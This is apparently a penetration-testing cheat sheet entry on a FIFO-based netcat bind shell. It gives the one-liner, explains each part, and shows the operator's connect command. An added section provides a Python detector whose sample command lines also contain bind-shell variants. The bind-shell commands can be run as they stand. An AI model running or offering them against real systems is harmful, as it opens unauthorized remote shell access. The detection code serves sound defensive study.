BASH
TARGET: FIFO-BASED NETCAT BIND SHELL
root@target:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
* rm /tmp/f removes any existing file at /tmp/f, so mkfifo does not fail if
a pipe is already there.
* mkfifo /tmp/f creates a named pipe (FIFO) at /tmp/f. this is a special file
used to pass data between processes.
* cat /tmp/f reads from the pipe; it blocks and waits until data (the
commands typed by the remote side) arrives.
* | /bin/bash -i feeds what cat reads from the pipe into an interactive Bash shell.
* 2>&1 redirects stderr (2) to stdout (1), so both error messages and normal
output go to the same place.
* | nc -lvp 1234 does the following:
- pipes the shell's output into a Netcat listener.
- Netcat listens on port 1234 and waits for a connection.
- once a client connects, whatever it types is passed through to the pipe
via /tmp/f, and the shell's responses flow back over the same connection.
* the trailing > /tmp/f redirect writes whatever the connected Netcat session
sends into /tmp/f, which cat is reading, closing the loop.
* Netcat listens on all interfaces (0.0.0.0) by default, so the shell is reachable
from any host that can reach the port; an unexpected process listening on a
high port is itself a useful detection signal.
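A detection-side check (added here; not part of this cheat sheet) that looks for the three parts above in a recorded process command line: a mkfifo, a listening nc/ncat/netcat, and the same FIFO being both read and written on one line. The sample command lines are constructed for illustration.

```python
import re
import shlex

# Constructed sample process command lines (auditd/EDR style); not from the page.
SAMPLE_CMDLINES = [
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f",
    "mkfifo /tmp/p; /bin/sh -i </tmp/p 2>&1 | ncat -l 4444 >/tmp/p",
    "mkfifo /var/run/myapp.fifo && tail -f /var/run/myapp.fifo | logger",
    "nc -zv 10.0.0.5 22",
    "cat /var/log/syslog | grep sshd",
]

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
NETCATS = {"nc", "ncat", "netcat"}

def _segments(cmdline):
    # Split on ; && || | into simple commands (quoting subtleties ignored).
    return [s.strip() for s in re.split(r"\|\||&&|[;|]", cmdline) if s.strip()]

def _is_listen_flag(arg):
    # Short-option cluster containing 'l' (-l, -lvp, -nlvp) or ncat's --listen.
    return arg == "--listen" or (arg.startswith("-") and not arg.startswith("--")
                                 and "l" in arg[1:])

def fifo_bind_shell_indicators(cmdline):
    """Return the set of indicator names found in one command line."""
    found, fifos = set(), set()
    for seg in _segments(cmdline):
        try:
            toks = shlex.split(seg)
        except ValueError:
            toks = seg.split()
        if not toks:
            continue
        prog = toks[0].rsplit("/", 1)[-1]
        if prog == "mkfifo":
            found.add("mkfifo")
            fifos.update(t for t in toks[1:] if not t.startswith("-"))
        elif prog in SHELLS and "-i" in toks:
            found.add("interactive_shell")
        elif prog in NETCATS and any(_is_listen_flag(a) for a in toks[1:]):
            found.add("nc_listen")
    # The FIFO is read (cat path or <path) and written (>path) on the same line.
    for f in map(re.escape, fifos):
        if re.search(r"(cat\s+%s\b|<\s*%s\b)" % (f, f), cmdline) and \
           re.search(r">\s*%s\b" % f, cmdline):
            found.add("fifo_loopback")
    return found

def is_fifo_bind_shell(cmdline):
    return {"mkfifo", "nc_listen", "fifo_loopback"} <= fifo_bind_shell_indicators(cmdline)

def scan(cmdlines):
    return [c for c in cmdlines if is_fifo_bind_shell(c)]
```

The legitimate mkfifo in the third sample is not flagged because nothing listens and the pipe is only read; pairing this with a listening-socket inventory (e.g. ss -ltnp) catches variants that split the steps across several processes.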
OCO
# connect to the listener on the target
root@oco:~$ nc {targetIP} {port}
...